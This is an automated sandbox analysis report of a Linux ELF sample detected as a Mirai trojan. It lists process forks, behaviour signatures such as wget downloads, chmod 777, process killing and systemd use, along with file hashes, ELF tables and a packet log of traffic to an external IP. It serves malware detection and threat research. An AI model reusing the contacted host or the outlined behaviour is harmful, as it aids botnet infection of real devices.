Linux
Analysis Report
5.elf
Overview
General Information
Detection
Score: | 56 |
Range: | 0 - 100 |
Whitelisted: | false |
Signatures
Classification
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1588850 |
Start date and time: | 2025-01-11 06:17:17 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 6m 48s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | defaultlinuxfilecookbook.jbs |
Analysis system description: | Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11) |
Analysis Mode: | default |
Sample name: | 5.elf |
Detection: | MAL |
Classification: | mal56.spre.evad.linELF@0/3@2/0 |
- Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
- VT rate limit hit for: 5.elf
Command: | /tmp/5.elf |
PID: | 5423 |
Exit Code: | |
Exit Code Info: | |
Killed: | True |
Standard Output: | |
Standard Error: |
- system is lnxubuntu20
- 5.elf New Fork (PID: 5436, Parent: 5423)
- sh New Fork (PID: 5438, Parent: 5436)
- 5.elf New Fork (PID: 5442, Parent: 5423)
- sh New Fork (PID: 5444, Parent: 5442)
- xfce4-panel New Fork (PID: 5427, Parent: 3147)
- xfce4-panel New Fork (PID: 5428, Parent: 3147)
- xfce4-panel New Fork (PID: 5429, Parent: 3147)
- xfce4-panel New Fork (PID: 5430, Parent: 3147)
- xfce4-panel New Fork (PID: 5431, Parent: 3147)
- xfce4-panel New Fork (PID: 5432, Parent: 3147)
- systemd New Fork (PID: 5440, Parent: 5439)
- systemd New Fork (PID: 5445, Parent: 1)
- bash New Fork (PID: 5453, Parent: 5445)
- bash New Fork (PID: 5464, Parent: 5445)
- bash New Fork (PID: 5465, Parent: 5445)
- bash New Fork (PID: 5467, Parent: 5445)
- bash New Fork (PID: 5468, Parent: 5445)
- cleanup
Click to jump to signature section
AV Detection |
---|
Source: | ReversingLabs: |
Source: | TCP traffic: | ||
Source: | TCP traffic: |
Source: | Wget executable: | Jump to behavior |
Source: | Socket: | Jump to behavior |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
System Summary |
---|
Source: | SIGKILL sent: | Jump to behavior | ||
Source: | SIGKILL sent: | Jump to behavior | ||
Source: | SIGKILL sent: | Jump to behavior | ||
Source: | SIGKILL sent: | Jump to behavior | ||
Source: | SIGKILL sent: | Jump to behavior | ||
Source: | SIGKILL sent: | Jump to behavior | ||
Source: | SIGKILL sent: | Jump to behavior | ||
Source: | SIGKILL sent: | Jump to behavior | ||
Source: | SIGKILL sent: | Jump to behavior | ||
Source: | SIGKILL sent: | Jump to behavior | ||
Source: | SIGKILL sent: | Jump to behavior | ||
Source: | SIGKILL sent: | Jump to behavior | ||
Source: | SIGKILL sent: | Jump to behavior | ||
Source: | SIGKILL sent: | Jump to behavior | ||
Source: | SIGKILL sent: | Jump to behavior |
Source: | String containing 'busybox' found: | ||
Source: | String containing 'busybox' found: |
Source: | .symtab present: |
Source: | SIGKILL sent: | Jump to behavior | ||
Source: | SIGKILL sent: | Jump to behavior | ||
Source: | SIGKILL sent: | Jump to behavior | ||
Source: | SIGKILL sent: | Jump to behavior | ||
Source: | SIGKILL sent: | Jump to behavior | ||
Source: | SIGKILL sent: | Jump to behavior | ||
Source: | SIGKILL sent: | Jump to behavior | ||
Source: | SIGKILL sent: | Jump to behavior | ||
Source: | SIGKILL sent: | Jump to behavior | ||
Source: | SIGKILL sent: | Jump to behavior | ||
Source: | SIGKILL sent: | Jump to behavior | ||
Source: | SIGKILL sent: | Jump to behavior | ||
Source: | SIGKILL sent: | Jump to behavior | ||
Source: | SIGKILL sent: | Jump to behavior | ||
Source: | SIGKILL sent: | Jump to behavior |
Source: | Classification label: |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior |
Source: | Chmod executable: | Jump to behavior |
Source: | Rm executable: | Jump to behavior |
Source: | Systemctl executable: | Jump to behavior | ||
Source: | Systemctl executable: | Jump to behavior |
Source: | Wget executable: | Jump to behavior |
Source: | File: | Jump to behavior |
Source: | Chmod executable with 777: | Jump to behavior |
Source: | File written: | Jump to dropped file |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | File: | Jump to behavior |
Source: | Sleep executable: | Jump to behavior |
Source: | Queries kernel information via 'uname': | Jump to behavior | ||
Source: | Queries kernel information via 'uname': | Jump to behavior | ||
Source: | Queries kernel information via 'uname': | Jump to behavior | ||
Source: | Queries kernel information via 'uname': | Jump to behavior | ||
Source: | Queries kernel information via 'uname': | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 1 Scripting | Valid Accounts | Windows Management Instrumentation | 1 Systemd Service | 1 Systemd Service | 2 File and Directory Permissions Modification | 1 OS Credential Dumping | 11 Security Software Discovery | Remote Services | Data from Local System | 2 Non-Application Layer Protocol | Exfiltration Over Other Network Medium | 1 Service Stop |
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Scripting | Boot or Logon Initialization Scripts | 11 File Deletion | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | 12 Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
39% | ReversingLabs | Linux.Trojan.Mirai |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
39% | ReversingLabs | Linux.Trojan.Mirai |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
100% | Avira URL Cloud | malware |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
daisy.ubuntu.com | 162.213.35.25 | true | false | high |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
103.136.41.100 | unknown | India | 139884 | AGPL-AS-APApeironGlobalPvtLtdIN | false |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
103.136.41.100 | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
daisy.ubuntu.com | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Gafgyt | Browse |
| ||
Get hash | malicious | Gafgyt | Browse |
| ||
Get hash | malicious | Gafgyt | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Gafgyt | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
AGPL-AS-APApeironGlobalPvtLtdIN | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | FFDroider | Browse |
| ||
Get hash | malicious | Neshta | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | ManusCrypt, Socelars | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | FFDroider | Browse |
|
Process: | /tmp/5.elf |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.20550551858566 |
Encrypted: | false |
SSDEEP: | 6:z8KbX9RZAMGCk4vEuIACLm+fOAkjF5CowzzQEsCBLQmWA4Rv:zb9RZADJiIE+m7qowXQWLHWrv |
MD5: | 56F063ADE41281D6A0E85EC130A90801 |
SHA1: | C0CFF3B5D09F8269A5D8D897F769D98E98DF6B64 |
SHA-256: | D7D4F94CC424065389C63AEF5E3DD56E5914DF8B8CC5761E1878E4AEA544D3AA |
SHA-512: | 56FE3EC635E80C088AD0AE7B32497AE195BB746507C0C3ECD8C3AE418AC96461EA8925A3597FADB9CBF920AD99D1930AECA7C4CDBBDF0E549524721718B03F30 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | /usr/lib/systemd/system-environment-generators/snapd-env-generator |
File Type: | |
Category: | dropped |
Size (bytes): | 76 |
Entropy (8bit): | 3.7627880354948586 |
Encrypted: | false |
SSDEEP: | 3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb |
MD5: | D86A1F5765F37989EB0EC3837AD13ECC |
SHA1: | D749672A734D9DEAFD61DCA501C6929EC431B83E |
SHA-256: | 85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45 |
SHA-512: | 338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | /usr/bin/wget |
File Type: | |
Category: | dropped |
Size (bytes): | 92028 |
Entropy (8bit): | 6.059129391642973 |
Encrypted: | false |
SSDEEP: | 1536:+/n8u+4suCJTOeGvl7aiKlj1yDnpLxMR+8MpipUlwPG3CFnmjSAyUX0v7p6dv:0eNQEiKlaJlwPG3SfAyUX0v7p6 |
MD5: | 40D57A51FFBA8151BF851940D0AD367E |
SHA1: | DD2BBF98840D5CFE68E6CDC660C6C25E4DE6DBC9 |
SHA-256: | C14F6F5A9F774456AEF2319034D9E6B57975164E2BDBF9A4BF178737A3E725C3 |
SHA-512: | B22D6758823E8726248D3D610F6DBBA6A40AE5B9A297CE76FEB189E6865B7C54B1232835CEEFD2AA6D3F262507935490293E53BEC7EA179111CA79DD038D8984 |
Malicious: | true |
Antivirus: |
|
Reputation: | low |
Preview: |
File type: | |
Entropy (8bit): | 6.059129391642973 |
TrID: |
|
File name: | 5.elf |
File size: | 92'028 bytes |
MD5: | 40d57a51ffba8151bf851940d0ad367e |
SHA1: | dd2bbf98840d5cfe68e6cdc660c6c25e4de6dbc9 |
SHA256: | c14f6f5a9f774456aef2319034d9e6b57975164e2bdbf9a4bf178737a3e725c3 |
SHA512: | b22d6758823e8726248d3d610f6dbba6a40ae5b9a297ce76feb189e6865b7c54b1232835ceefd2aa6d3f262507935490293e53bec7ea179111ca79dd038d8984 |
SSDEEP: | 1536:+/n8u+4suCJTOeGvl7aiKlj1yDnpLxMR+8MpipUlwPG3CFnmjSAyUX0v7p6dv:0eNQEiKlaJlwPG3SfAyUX0v7p6 |
TLSH: | F693FA86F881AA11C6C142B7BD2F055E3306A7A8E2DE7353DD241B64778B95F0F27A07 |
File Content Preview: | .ELF..............(.....T...4...te......4. ...(.....................DY..DY...............`...`...`..................Q.td..................................-...L..................@-.,@...0....S..... 0....S.........../..0...0...@..../..d.......`....-.@0....S |
ELF header | |
---|---|
Class: | |
Data: | |
Version: | |
Machine: | |
Version Number: | |
Type: | |
OS/ABI: | |
ABI Version: | 0 |
Entry Point Address: | |
Flags: | |
ELF Header Size: | 52 |
Program Header Offset: | 52 |
Program Header Size: | 32 |
Number of Program Headers: | 3 |
Section Header Offset: | 91508 |
Section Header Size: | 40 |
Number of Section Headers: | 13 |
Header String Table Index: | 12 |
Name | Type | Address | Offset | Size | EntSize | Flags | Flags Description | Link | Info | Align |
---|---|---|---|---|---|---|---|---|---|---|
NULL | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0 | 0 | 0 | ||
.init | PROGBITS | 0x8094 | 0x94 | 0x10 | 0x0 | 0x6 | AX | 0 | 0 | 4 |
.text | PROGBITS | 0x80b0 | 0xb0 | 0x13f14 | 0x0 | 0x6 | AX | 0 | 0 | 16 |
.fini | PROGBITS | 0x1bfc4 | 0x13fc4 | 0x10 | 0x0 | 0x6 | AX | 0 | 0 | 4 |
.rodata | PROGBITS | 0x1bfd4 | 0x13fd4 | 0x1970 | 0x0 | 0x2 | A | 0 | 0 | 4 |
.eh_frame | PROGBITS | 0x26000 | 0x16000 | 0x4 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.init_array | INIT_ARRAY | 0x26004 | 0x16004 | 0x4 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.fini_array | FINI_ARRAY | 0x26008 | 0x16008 | 0x4 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.got | PROGBITS | 0x26010 | 0x16010 | 0x74 | 0x4 | 0x3 | WA | 0 | 0 | 4 |
.data | PROGBITS | 0x26084 | 0x16084 | 0x478 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.bss | NOBITS | 0x264fc | 0x164fc | 0x29b0 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.ARM.attributes | ARM_ATTRIBUTES | 0x0 | 0x164fc | 0x10 | 0x0 | 0x0 | 0 | 0 | 1 | |
.shstrtab | STRTAB | 0x0 | 0x1650c | 0x67 | 0x0 | 0x0 | 0 | 0 | 1 |
Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Entropy | Flags | Flags Description | Align | Prog Interpreter | Section Mappings |
---|---|---|---|---|---|---|---|---|---|---|---|
LOAD | 0x0 | 0x8000 | 0x8000 | 0x15944 | 0x15944 | 6.1229 | 0x5 | R E | 0x8000 | .init .text .fini .rodata | |
LOAD | 0x16000 | 0x26000 | 0x26000 | 0x4fc | 0x2eac | 5.9874 | 0x6 | RW | 0x8000 | .eh_frame .init_array .fini_array .got .data .bss | |
GNU_STACK | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0.0000 | 0x7 | RWE | 0x4 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 11, 2025 06:18:03.733494997 CET | 34549 | 53 | 192.168.2.13 | 1.1.1.1 |
Jan 11, 2025 06:18:03.738420010 CET | 53 | 34549 | 1.1.1.1 | 192.168.2.13 |
Jan 11, 2025 06:18:03.738480091 CET | 34549 | 53 | 192.168.2.13 | 1.1.1.1 |
Jan 11, 2025 06:18:03.738533020 CET | 34549 | 53 | 192.168.2.13 | 1.1.1.1 |
Jan 11, 2025 06:18:03.743469000 CET | 53 | 34549 | 1.1.1.1 | 192.168.2.13 |
Jan 11, 2025 06:18:03.743513107 CET | 34549 | 53 | 192.168.2.13 | 1.1.1.1 |
Jan 11, 2025 06:18:14.664813042 CET | 50808 | 80 | 192.168.2.13 | 103.136.41.100 |
Jan 11, 2025 06:18:14.674068928 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:14.674164057 CET | 50808 | 80 | 192.168.2.13 | 103.136.41.100 |
Jan 11, 2025 06:18:14.676928043 CET | 50808 | 80 | 192.168.2.13 | 103.136.41.100 |
Jan 11, 2025 06:18:14.684148073 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.289175034 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.289251089 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.289290905 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.289328098 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.289364100 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.289361954 CET | 50808 | 80 | 192.168.2.13 | 103.136.41.100 |
Jan 11, 2025 06:18:15.289361954 CET | 50808 | 80 | 192.168.2.13 | 103.136.41.100 |
Jan 11, 2025 06:18:15.289361954 CET | 50808 | 80 | 192.168.2.13 | 103.136.41.100 |
Jan 11, 2025 06:18:15.289402962 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.289438009 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.289453030 CET | 50808 | 80 | 192.168.2.13 | 103.136.41.100 |
Jan 11, 2025 06:18:15.289453983 CET | 50808 | 80 | 192.168.2.13 | 103.136.41.100 |
Jan 11, 2025 06:18:15.289453983 CET | 50808 | 80 | 192.168.2.13 | 103.136.41.100 |
Jan 11, 2025 06:18:15.289475918 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.289486885 CET | 50808 | 80 | 192.168.2.13 | 103.136.41.100 |
Jan 11, 2025 06:18:15.289510012 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.289549112 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.289556980 CET | 50808 | 80 | 192.168.2.13 | 103.136.41.100 |
Jan 11, 2025 06:18:15.289556980 CET | 50808 | 80 | 192.168.2.13 | 103.136.41.100 |
Jan 11, 2025 06:18:15.289587975 CET | 50808 | 80 | 192.168.2.13 | 103.136.41.100 |
Jan 11, 2025 06:18:15.298974037 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.299010992 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.299030066 CET | 50808 | 80 | 192.168.2.13 | 103.136.41.100 |
Jan 11, 2025 06:18:15.299067020 CET | 50808 | 80 | 192.168.2.13 | 103.136.41.100 |
Jan 11, 2025 06:18:15.299245119 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.299278021 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.299302101 CET | 50808 | 80 | 192.168.2.13 | 103.136.41.100 |
Jan 11, 2025 06:18:15.299345970 CET | 50808 | 80 | 192.168.2.13 | 103.136.41.100 |
Jan 11, 2025 06:18:15.379168987 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.379218102 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.379281044 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.379348040 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.379370928 CET | 50808 | 80 | 192.168.2.13 | 103.136.41.100 |
Jan 11, 2025 06:18:15.379370928 CET | 50808 | 80 | 192.168.2.13 | 103.136.41.100 |
Jan 11, 2025 06:18:15.379385948 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.380099058 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.380139112 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.380177021 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.380184889 CET | 50808 | 80 | 192.168.2.13 | 103.136.41.100 |
Jan 11, 2025 06:18:15.380916119 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.380954027 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.380991936 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.381786108 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.381829023 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.381865025 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.382590055 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.382633924 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.382671118 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.383425951 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.383440018 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.383455038 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.384265900 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.384280920 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.384294987 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.385063887 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.390892029 CET | 50808 | 80 | 192.168.2.13 | 103.136.41.100 |
Jan 11, 2025 06:18:15.468894005 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.468934059 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.468945980 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.468985081 CET | 50808 | 80 | 192.168.2.13 | 103.136.41.100 |
Jan 11, 2025 06:18:15.468985081 CET | 50808 | 80 | 192.168.2.13 | 103.136.41.100 |
Jan 11, 2025 06:18:15.469363928 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.469381094 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.469396114 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.469933033 CET | 50808 | 80 | 192.168.2.13 | 103.136.41.100 |
Jan 11, 2025 06:18:15.470201969 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.470216990 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.470232010 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
Jan 11, 2025 06:18:15.470237017 CET | 50808 | 80 | 192.168.2.13 | 103.136.41.100 |
Jan 11, 2025 06:18:15.471045971 CET | 80 | 50808 | 103.136.41.100 | 192.168.2.13 |
